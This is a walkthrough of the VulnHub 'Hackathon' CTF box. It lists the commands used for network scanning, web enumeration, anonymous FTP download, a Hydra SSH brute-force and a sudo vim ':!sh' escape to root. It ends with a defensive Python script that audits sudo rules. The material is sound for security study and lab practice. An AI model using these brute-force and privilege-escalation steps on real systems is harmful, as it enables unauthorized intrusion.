Hackathon CTF VulnHub | Writeup | Walkthrough
Hello friends, I’m Shams Ul Mehmood and this is my 7th article. This article is a full walkthrough of the Hackathon CTF box. It covers several techniques and weaknesses: enumeration, network scanning, anonymous FTP login, SSH credential brute-forcing and abusing improperly set root privileges (sudo) for privilege escalation. You can download this VulnHub box from here.
Pentesting Methodology
- Getting the target machine IP Address by using arp-scan
- Getting open port details by using the Nmap Tool
- Enumerating HTTP service with Dirb / Nikto / Gobuster Utilities
- Enumerating FTP service and reading the first flag
- SSH brute-forcing with Hydra
- Getting the root and reading the flag
Step-1:
📌️ In the first step, I used the arp-scan command to perform a local network scan and find the IP address of the target box.
Command : sudo arp-scan 192.168.163.0/24
Step-2:
📌️ In the second step, after getting the victim machine’s IP address, I ran an Nmap scan against it with the following options:
- -sS : TCP SYN (half-open) scan to find open ports and the services listening on them.
- -sV : service/version detection for each open port.
- -p- : scan all 65535 TCP ports on the victim machine.
- -sC : run the default NSE scripts.
- -Pn : skip host discovery and treat the host as up.
- -O : operating system detection.
- -A : aggressive mode, which enables OS detection, version detection, script scanning and traceroute.
Command : sudo nmap -A -p- -Pn -O -sV -sC -sS 192.168.163.131
Step-3:
📌 In this step I enumerated the HTTP service, starting by opening the victim’s IP address over HTTP on the default port 80 in a browser.
Command : http://192.168.163.131:80
📌 I used several tools, namely dirb, gobuster and nikto, to enumerate interesting hidden files and directories on the target machine.
📌 First I ran dirb and nikto against the victim IP address over HTTP on the default port (80); this scan found several directories and files such as index.html and robots.txt.
Command : dirb http://192.168.163.131
Command : nikto -h 192.168.163.131
📌 Then I ran gobuster against the victim IP address over HTTP on the default port (80); this scan found several directories and files such as index.html, happy and robots.txt.
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.163.131
Step-4:
📌 In step 4, anonymous FTP access is allowed, so I recursively downloaded all the available files from the victim to the attacker machine with the following command.
Command : wget -r ftp://192.168.163.131
📌 Then I listed the files and directories in my current (desktop) directory and found a new directory named 192.168.163.131. After changing into it, I found two interesting files inside.
Command : ls -al
Command : ls ./192.168.163.131
Command : cd 192.168.163.131
Command : ls
📌 Then I displayed the content of the flag1.txt file.
Command : cat flag1.txt
📌 Then I displayed the content of the word.dir file; it is a dictionary file that can be used to brute-force different logins.
Command : cat word.dir
Step-5:
📌 In this step I used Hydra, a tool that performs online brute-forcing. By contrast, there are also offline password-cracking tools such as John the Ripper.
Command : ls
Command : hydra -l hackathonll -P word.dir ssh://192.168.163.131:7223 -I
📌 Next, I used the dictionary list to brute-force the SSH service running on port 7223. With the recovered credentials, I logged in to the SSH server.
Command : ssh hackathonll@192.168.163.131 -p 7223
Command : id
Command : whoami
Command : ls
Command : cd /
Command : sudo -l
📌 While searching for the next clue, I checked my sudo permissions.
📌 Luckily, the vim editor could be run as root through sudo without requiring the root password.
Command : sudo -u root /usr/bin/vim
📌 I ran the ‘:!sh’ command from inside the vim editor to spawn a shell; because vim was running as root, this gave me a root shell, and with it the root flag.
Command : id
Command : cd /root
Command : ls
Command : cat flag2.txt
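A defender-side check for the sudo misconfiguration abused in Step-5, as an added example that is not from the original write-up: it parses `sudo -l` output and flags root-runnable rules that amount to a root shell, such as the vim entry. The sample output below is constructed, and the list of editors with shell escapes is an assumption.

```python
import re
from pathlib import PurePosixPath

# Editors that can spawn a child shell from inside the editor (the ':!sh'
# escape used on this box). Minimal set; an assumption for this example.
SHELL_ESCAPE_EDITORS = {"vim", "vi", "view", "vim.basic", "vim.tiny"}

# One sudoers rule line as printed by `sudo -l`: "(runas) TAG: cmd, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Constructed sample of `sudo -l` output; the box's real output is not reproduced.
SAMPLE_SUDO_L = """\
Matching Defaults entries for hackathonll on hackathon:
    env_reset, mail_badpass

User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
    (root) /bin/systemctl restart apache2
"""


def parse_sudo_l(output):
    """Return (runas, tags, command) tuples from the rules section of `sudo -l`."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip().upper() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def audit_sudo_l(output):
    """Flag rules that hand out a root shell: ALL, or an editor with a shell escape."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        if runas.split(":")[0].strip() not in ("root", "ALL"):
            continue  # not a root-equivalent rule
        prog = PurePosixPath(cmd.split()[0]).name
        if cmd == "ALL":
            reason = "any command as root"
        elif prog in SHELL_ESCAPE_EDITORS:
            reason = f"{prog} can run ':!sh' to spawn a root shell"
        else:
            continue
        findings.append({"command": cmd, "nopasswd": "NOPASSWD" in tags, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print(finding)
```

Running it against real `sudo -l` output on a host (or against /etc/sudoers rule lines of the same shape) lists the entries that should be removed or restricted, with NOPASSWD entries being the most urgent.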
CTF Game Over : I am Root!